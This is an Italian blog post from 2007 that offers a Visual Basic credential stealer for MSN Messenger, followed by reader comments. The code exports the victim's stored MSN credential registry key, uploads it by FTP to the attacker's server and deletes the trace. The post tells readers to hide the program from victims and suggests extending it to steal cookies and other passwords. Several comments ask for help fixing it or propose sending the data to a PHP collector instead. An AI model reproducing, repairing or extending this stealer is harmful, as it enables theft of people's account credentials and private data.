Emoticon Gratis per Windows Live Messenger

19 giugno 2007

Ruba le password di msn

Ecco un programma fatto da KinG-LioN & KingOfTheWorld per poter rubare le password su msn...per poter creare il programma dovete avere almeno un po di esperienza in programmazione e dovete usare il visual basic!

+#####################################
# By
# KinG-LioN & KingOfTheWorld
# VB Lenguage - admin[]eurohackers.it
+#####################################
Shell (”command.com /c reg export HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL c:\pwd.txt”)
Dim passw As String
Dim ftpurl As String
asd = “tuoftp”
lol = “tuapassw”
ftpurl = “ftp://tuoftp.altervista.org”
inet.URL = ftpurl
inet.UserName = asd
inet.Password = lol
passw = “pwd.txt”
inet.Execute inet.URL, “PUT C:\pwd.txt ” & passw
Do While inet.StillExecuting = True
DoEvents
Loop
Kill “C:\pwd.txt”
End Sub


Editati i file e nascosto il programma, quando la vittima lo esegue vi spedira allo spazio web da voi scelto la sua chiave di registro contenente la password di msn in base64.

Programma open Source potete aggiungere qualsiasi valore per ottenere ad esempio i cookie o le varie password di qualsiasi servizio in uso sul pc della vittima.
Fonte--->www.eurohackers.it

15 commenti:

Banana Joe ha detto...

FaNtAsTiChEvOlE!!!

Anonimo ha detto...

Il programma non è fatto da Kinglion,lui di programmazione non ne sa nulla...è solo un edit...il vero programma è stato creato da ROSSI46GO

;)

bY BlACkFiRE

Anonimo ha detto...

Funziona davvero?

Anonimo ha detto...

non so perchè quando lo compilo con visual basic mi da problemi cioè alcune strige me le da non valide quelle contenenti questo --> / <---

Anonimo ha detto...

qualcuno mi aiuta?????

Anonimo ha detto...

ciao scusate..io il visual basic lo so abbastanza usare ma non capisco una cosa
la shell in vb mi da un errore come posso fare??grazie in anticipo
cmq il programma fantastico

Anonimo ha detto...

nonostante sembrasse che l'ideatore di questo programma l'avesse scritto con le chiappe del suo cane sono riuscito ad aggiustare tutto tranne una cosa:
ho aggiunto il Sub mancante (perchè c'era solo l'End Sub)
ma ora (non sono pratico di VB)
non so che identificatore usare, datemi un mano!!!!

Anonimo ha detto...

Packmaster dice.....
Scusatemi dell'ignoranza xchè nn sono un esperto di visual basic. Ma perchè è necessaria anche la mia password per ricevere la chiave di registro contenente la password in base 64?

Anonimo ha detto...

perchè quella è la password del tuo spazio ftp...


ragazzi, imho questo prog va modificato...
io passo a un file php nel mio sito il valore criptato con GET
il file php si limita a salvare in un file di testo tutto ciò che riceve via get...

ciaoz

Anonimo ha detto...

OMG! Raga cazzo quante volte lo devo dire ke io con questo programma non c'entro niente?! QUESTO CODE NON E' MIO! io ho realizzato qualcosa di simile ma non è questo! lo sto scrivendo ovunque...

Anonimo ha detto...

Io chiedo una cosa più importante... Dato che di visual basic e altro non ci capisco una mazza.... Come si fà per evitare di farsi rubare la pass? Insomma con questo metodo non c'è scampo?

Anonimo ha detto...

Basta lamerate, kinglion... basta. Potresti diventare un grande, ma sembra non ti interessi molto.
E' meglio restare adagiato sugli allori e farsi leccare il culo da 4 cicisbei forse???

teogolden ha detto...

wei raga facciamo cosi visto che dà errori se qualcuno gentilmente puo riscrivere nei commenti il comando corretto? è una buona idea no? rx by =teogolden=

Anonimo ha detto...

salve avrei bisogno di aiuto. mi hanno hackerato il contatto msn come posso fare a riaverlo?grazie mi sareste ti molto aiuto.

Anonimo ha detto...

ma cosa è visual basic?come faccio ad istallare il programma???aiutooooooooooooooooooooooooo

Emoticon Gratis Per il Tuo Msn 2009